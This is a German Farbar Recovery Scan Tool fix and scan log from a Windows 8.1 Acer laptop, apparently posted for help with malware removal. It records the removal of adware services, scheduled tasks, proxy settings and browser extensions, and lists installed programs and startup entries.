"HKLM\SOFTWARE\Policies\Google" => Schlüssel erfolgreich entfernt
========= RemoveProxy: =========
"HKU\S-1-5-21-1569062512-718196537-2772323438-1001\SOFTWARE\Policies\Microsoft\Internet Explorer" => Schlüssel erfolgreich entfernt
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable => Wert erfolgreich entfernt
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => Wert erfolgreich entfernt
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => Wert erfolgreich entfernt
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => Wert erfolgreich entfernt
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => Wert erfolgreich entfernt
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => Wert erfolgreich entfernt
========= Ende von RemoveProxy: =========
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\NameServer => Wert erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4571CE39-7AA0-4823-8EC3-32F036C84A15}\\DhcpNameServer => Wert erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{F18236D5-1611-402B-B44F-1648D518953D}\\DhcpNameServer => Wert erfolgreich entfernt
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\SOFTWARE\Policies\Microsoft\Internet Explorer => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wert erfolgreich wiederhergestellt
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{CC865B26-C31D-4D23-B17B-96548EEF03F6}" => Schlüssel erfolgreich entfernt
HKCR\CLSID\{CC865B26-C31D-4D23-B17B-96548EEF03F6} => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wert erfolgreich wiederhergestellt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}" => Schlüssel erfolgreich entfernt
HKCR\CLSID\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} => Schlüssel nicht gefunden.
"HKLM\Software\Wow6432Node\MozillaPlugins\@Nero.com/KM" => Schlüssel erfolgreich entfernt
"HKLM\Software\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3" => Schlüssel erfolgreich entfernt
"HKLM\Software\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9" => Schlüssel erfolgreich entfernt
"HKLM\Software\Wow6432Node\MozillaPlugins\samsung.com/SamsungLinkPCPlugin" => Schlüssel erfolgreich entfernt
C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default\searchplugins\DD1B66D4.xml => erfolgreich verschoben
C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\DD1B66D4.xml => erfolgreich verschoben
HKLM\Software\Mozilla\Firefox\Extensions\\{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF} => Wert erfolgreich entfernt
HKLM\Software\Mozilla\Firefox\Extensions\\{AD00B37B-5BD6-4ED2-8964-6499F4764071} => Wert erfolgreich entfernt
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF} => Wert erfolgreich entfernt
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{AD00B37B-5BD6-4ED2-8964-6499F4764071} => Wert erfolgreich entfernt
Arygnarj => Dienst erfolgreich entfernt
"C:\Users\Denny\AppData\Roaming\FeykfeCekd" => nicht gefunden.
Fuelf => Dienst erfolgreich entfernt
"C:\Users\Denny\AppData\Roaming\ChnuutEjuryqh" => nicht gefunden.
IDriverT => Dienst erfolgreich entfernt
C:\WINDOWS\system32\diee => erfolgreich verschoben
C:\WINDOWS\system32\ebo => erfolgreich verschoben
C:\Users\Denny\AppData\Roaming\Leihjuef => erfolgreich verschoben
C:\WINDOWS\system32\oha => erfolgreich verschoben
C:\WINDOWS\system32\ahua => erfolgreich verschoben
C:\WINDOWS\system32\wof => erfolgreich verschoben
C:\WINDOWS\system32\wyfw => erfolgreich verschoben
C:\WINDOWS\system32\tob => erfolgreich verschoben
C:\WINDOWS\system32\riv => erfolgreich verschoben
C:\WINDOWS\system32\baf => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{13B8CF77-9E85-407D-A789-112A0DDF8A7F}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{13B8CF77-9E85-407D-A789-112A0DDF8A7F}" => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Foxvohji => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Foxvohji" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{221D435A-EA55-420E-8423-8ED93C16F2BD}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{221D435A-EA55-420E-8423-8ED93C16F2BD}" => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\{862ADFBD-2F9C-1196-63CC-68B979092056} => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{862ADFBD-2F9C-1196-63CC-68B979092056}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6D2FBF57-89ED-48A5-B2E0-752E571395C4}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6D2FBF57-89ED-48A5-B2E0-752E571395C4}" => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\{07238A32-598B-4B2D-8035-1479B16A3DB0} => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{07238A32-598B-4B2D-8035-1479B16A3DB0}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{767E686C-0DA9-4ED3-9F7E-C07DBE050AF0}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{767E686C-0DA9-4ED3-9F7E-C07DBE050AF0}" => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Siaby => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Siaby" => Schlüssel erfolgreich entfernt
"C:\PROGRA~1\SHOPPE~1" => nicht gefunden.
"C:\PROGRA~1\SHOPPE~2" => nicht gefunden.
"C:\PROGRA~1\SHOPPE~3" => nicht gefunden.
"C:\PROGRA~1\GROOVE~1" => nicht gefunden.
"C:\Users\Denny\AppData\Roaming\yoursearching" => nicht gefunden.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9DD2C156-62AC-406B-9385-CADD795FD545}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9DD2C156-62AC-406B-9385-CADD795FD545}" => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Conbyg => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Conbyg" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9FCAB4F1-032C-4A7C-964D-D7642FE7C9C7}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9FCAB4F1-032C-4A7C-964D-D7642FE7C9C7}" => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Fimgumbo => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Fimgumbo" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A641688E-E37E-40B4-9239-4268905DD07C}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A641688E-E37E-40B4-9239-4268905DD07C}" => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Vuaga => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Vuaga" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BE213BAE-DF95-400C-ADD4-F489EA0AEC83}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BE213BAE-DF95-400C-ADD4-F489EA0AEC83}" => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Sitnis => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Sitnis" => Schlüssel erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9532778B-533D-41E9-B1C9-7856FDB5133B} => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{4D6AF942-EAF0-47BB-B0F4-0359D6091F30} => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9B59EAE9-A372-4F68-B16F-2ECAA3EA515A} => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A4EA84FD-B131-452D-A687-2FC8D2EB78C3} => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{15BEFA30-7102-42C0-961B-A344E9E0251A} => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{BD3B9774-3F44-4838-8A8F-6414A358A460} => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B428C9A2-4E8F-439D-A91F-894BF3994FC5} => Wert erfolgreich entfernt
========= dir %appdata% /a d =========
Datentr�ger in Laufwerk C: ist Acer
Volumeseriennummer: 9CE1-4C4E
Verzeichnis von C:\Users\Denny\AppData\Roaming
29.03.2016 16:34 <DIR> .
29.03.2016 16:34 <DIR> ..
07.09.2013 22:29 <DIR> acer
24.12.2014 23:22 <DIR> Adobe
07.09.2013 18:10 <DIR> Atheros
21.03.2016 18:43 <DIR> Avira
29.03.2014 08:08 <DIR> com.adobe.downloadassistant.AdobeDownloadAssistant
22.03.2014 22:54 <DIR> CyberLink
10.11.2013 14:28 <DIR> EPSON
24.10.2013 12:59 <DIR> Identities
07.09.2013 18:13 <DIR> Macromedia
19.02.2015 07:16 <DIR> Microsoft
27.02.2014 18:09 <DIR> Mozilla
22.03.2014 22:41 <DIR> Nero
28.03.2014 08:36 <DIR> Nikon
16.03.2014 14:40 <DIR> SAMSUNG
0 Datei(en), 0 Bytes
Verzeichnis von C:\Users\Denny\Desktop
Datei nicht gefunden
========= Ende von CMD: =========
========= dir "C:\Program Files" /a d =========
Datentr�ger in Laufwerk C: ist Acer
Volumeseriennummer: 9CE1-4C4E
Verzeichnis von C:\Program Files
22.03.2016 00:39 <DIR> .
22.03.2016 00:39 <DIR> ..
10.11.2013 21:21 <DIR> Acer
29.07.2015 22:55 <DIR> Adobe
21.03.2016 23:15 <DIR> Common Files
22.03.2014 23:08 <DIR> CyberLink
22.08.2013 17:35 174 desktop.ini
24.10.2013 10:20 <DIR> EPSON
07.09.2013 23:59 <JUNCTION> Gemeinsame Dateien [C:\Program Files\Common Files]
29.07.2015 23:07 <DIR> Intel
21.03.2016 17:29 <DIR> Internet Explorer
14.10.2013 17:18 <DIR> Microsoft Office
24.10.2013 13:18 <DIR> MSBuild
24.10.2013 12:28 <DIR> Realtek
24.10.2013 13:18 <DIR> Reference Assemblies
31.10.2013 18:50 <DIR> Samsung
26.07.2012 09:22 <DIR> Uninstall Information
12.08.2015 07:55 <DIR> Windows Defender
09.03.2016 09:37 <DIR> Windows Journal
01.01.2015 16:45 <DIR> Windows Mail
01.01.2015 16:45 <DIR> Windows Media Player
01.01.2015 16:45 <DIR> Windows Multimedia Platform
24.10.2013 12:56 <DIR> Windows NT
01.01.2015 16:45 <DIR> Windows Photo Viewer
01.01.2015 16:45 <DIR> Windows Portable Devices
24.10.2013 12:42 <DIR> Windows Sidebar
21.03.2016 23:32 <DIR> WindowsApps
01.01.2015 16:44 <DIR> WindowsPowerShell
1 Datei(en), 174 Bytes
Verzeichnis von C:\Users\Denny\Desktop
Datei nicht gefunden
========= Ende von CMD: =========
EmptyTemp: => 494.5 MB temporäre Dateien entfernt.
Das System musste neu gestartet werden.
==== Ende von Fixlog 16:37:40 ====
Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
durchgeführt von Denny (2016-03-29 19:07:20)
Gestartet von C:\Users\Denny\Desktop
Windows 8.1 (X64) (2013-10-24 10:59:13)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-1569062512-718196537-2772323438-500 - Administrator - Enabled) => C:\Users\Administrator.Schneider
Denny (S-1-5-21-1569062512-718196537-2772323438-1001 - Administrator - Enabled) => C:\Users\Denny
Gast (S-1-5-21-1569062512-718196537-2772323438-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1569062512-718196537-2772323438-1005 - Limited - Enabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
Acer Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.03.3000 - Acer Incorporated)
Acer Docs Office AddIn (HKLM-x32\...\{DCBF3379-246B-47E1-8173-639B63940838}) (Version: 2.04.2005 - Acer)
Acer Launch Manager (HKLM\...\{C18D55BD-1EC6-466D-B763-8EEDDDA9100E}) (Version: 8.00.3003 - Acer Incorporated)
Acer Media (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.04.3002.6 - Acer Incorporated)
Acer Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.04.3003.1 - Acer Incorporated)
Acer Portal (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.04.3004 - Acer Incorporated)
Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3012 - Acer Incorporated)
Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3016 - Acer Incorporated)
Acer Remote Files (HKLM\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 1.02.3001 - Acer Incorporated)
Acer USB Charge Manager (HKLM\...\{07E867C5-0C48-40FF-A013-DDAF4565AD47}) (Version: 2.00.3004 - Acer Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 4.0.0.1390 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.7.0.413 - Adobe Systems Incorporated)
Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2.6 - Adobe Systems Incorporated)
Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Adobe Photoshop Elements 13 (HKLM-x32\...\{609818B9-23EB-4196-B466-EFE05E92A32F}) (Version: 13.0 - Adobe Systems Incorporated)
Amazon 1Button App (x32 Version: 1.0.6 - Amazon) Hidden
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.16.282 - Avira Operations GmbH & Co. KG)
clear.fi SDK - Video 2 (x32 Version: 2.2.2722 - CyberLink Corp.) Hidden
clear.fi SDK- Movie 2 (x32 Version: 2.2.2729 - CyberLink Corp.) Hidden
CyberLink MediaEspresso 6.5 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.3729_45993 - CyberLink Corp.)
Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.17 - Dolby Laboratories Inc)
Epson Customer Research Participation (HKLM\...\{B26449A6-6007-4460-B4FE-C4776115BCEA}) (Version: 1.61.0000 - EPSON)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - Seiko Epson Corporation)
EPSON XP-700 Series Printer Uninstall (HKLM\...\EPSON XP-700 Series) (Version: - SEIKO EPSON Corporation)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 35.0.1916.153 - Google Inc.)
HID Monitor (HKLM-x32\...\{31923C55-8208-4D0A-8AD6-3AE099A1A741}) (Version: 1.1.5 - Acer Incorporated)
Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3006 - Acer Incorporated)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1281 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
Live Updater (HKLM-x32\...\{EE26E302-876A-48D9-9058-3129E5B99999}) (Version: 2.00.3010 - Acer Incorporated)
Malwarebytes Anti-Malware Version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\SkyDriveSetup.exe) (Version: 16.4.6013.0910 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Mozilla Firefox 45.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 45.0.1 (x86 de)) (Version: 45.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.0.1 - Mozilla)
Nero BackItUp 12 Essentials OEM.a01 (HKLM-x32\...\{4CA8F973-6377-4ABF-9ED5-CC2323B3C000}) (Version: 12.5.00500 - Nero AG)
Nero MediaHome Free (HKLM-x32\...\{6CC8CA12-AD2B-4C07-B2C4-B32CDBF5F29D}) (Version: 15.0.01800 - Nero AG)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.0.1 - Nikon)
Picture Control Utility (HKLM-x32\...\{87441A59-5E64-4096-A170-14EFE67200C3}) (Version: 1.2.2 - Nikon)
Prerequisite installer (x32 Version: 12.0.0003 - Nero AG) Hidden
Prerequisite installer (x32 Version: 15.0.0005 - Nero AG) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.222 - Qualcomm Atheros Communications)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.14.327.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6870 - Realtek Semiconductor Corp.)
Realtek PCIE Card Reader (HKLM-x32\...\{C9661090-C134-46E8-90B2-76D72355C2A6}) (Version: 6.2.9200.21222 - Realtek Semiconductor Corp.)
Samsung Link 1.8.0.1403131552 (HKLM\...\8474-7877-9059-0204) (Version: 1.8.0.1403131552 - Copyright 2013 SAMSUNG)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.33.0 - SAMSUNG Electronics Co., Ltd.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Software Updater (HKLM-x32\...\{B307472F-7BD9-4040-9255-CE6D6A1196A3}) (Version: 4.3.1 - SEIKO EPSON CORPORATION)
SonyEditor (remove only) (HKLM-x32\...\SonyEditor) (Version: - )
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
CustomCLSID: HKU\S-1-5-21-1569062512-718196537-2772323438-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {1297570B-38F1-49A5-A941-B11ED2E003D4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-05] (Adobe Systems Incorporated)
Task: {45E15A8F-D60A-4899-94EE-F2D2FFC44C1D} - System32\Tasks\{55AB0601-0B56-F46D-28BD-EBA44DF6A920} => C:\WINDOWS\system32\regsvr32.exe [2014-10-29] (Microsoft Corporation)
Task: {582339AA-55CB-446D-9C0A-E237D27C9460} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2013-02-08] (CyberLink)
Task: {6631CA39-E6CA-443E-A7B3-C72F37978029} - System32\Tasks\{12146BCF-AB85-4EF1-B4A9-E5E62ADD7B59} => pcalua.exe -a "C:\Program Files (x86)\GUPlayer\Uninstaller.exe" -d "C:\Program Files (x86)\GUPlayer"
Task: {691F8DB4-04E1-4275-8E3C-4A02A8A0BF55} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-22] (Microsoft Corporation)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2013-10-31 18:49 - 2014-03-13 16:52 - 00013824 _____ () C:\Program Files\Samsung\Samsung Link\JniSys.dll
2016-03-29 16:39 - 2016-03-29 16:39 - 00515584 _____ () C:\Windows\Temp\sqlite-3.7.2-sqlitejdbc.dll
2013-10-31 18:49 - 2014-03-13 16:52 - 02149376 _____ () C:\Program Files\Samsung\Samsung Link\scone_proxy.dll
2013-10-31 18:49 - 2014-03-13 16:52 - 01630720 _____ () C:\Program Files\Samsung\Samsung Link\scone_stub.dll
2013-06-29 02:51 - 2013-02-20 22:58 - 00111176 _____ () C:\Program Files (x86)\Acer\clear.fi plug-in\Clearfishellext_x64.dll
2010-01-30 02:40 - 2010-01-30 02:40 - 04254560 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-01-30 03:41 - 2010-01-30 03:41 - 04254560 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2013-06-29 02:11 - 2013-02-18 07:38 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2013-08-22 15:25 - 2013-08-22 15:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\acer01.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKLM\...\StartupApproved\Run: => "ETDCtrl"
HKLM\...\StartupApproved\Run: => "Samsung Link"
HKLM\...\StartupApproved\Run: => "3D BubbleSound"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
HKLM\...\StartupApproved\Run32: => "Nikon Message Center 2"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKLM\...\StartupApproved\Run32: => "Registry Helper"
HKLM\...\StartupApproved\Run32: => "fst_de_19"
HKLM\...\StartupApproved\Run32: => "t4pc_en_3"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "gmsd_de_005010126"
HKLM\...\StartupApproved\Run32: => "YTDownloader"
HKLM\...\StartupApproved\Run32: => " QQPCTray"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\StartupFolder: => "OneNote 2010 Bildschirmausschnitt- und Startprogramm.lnk"
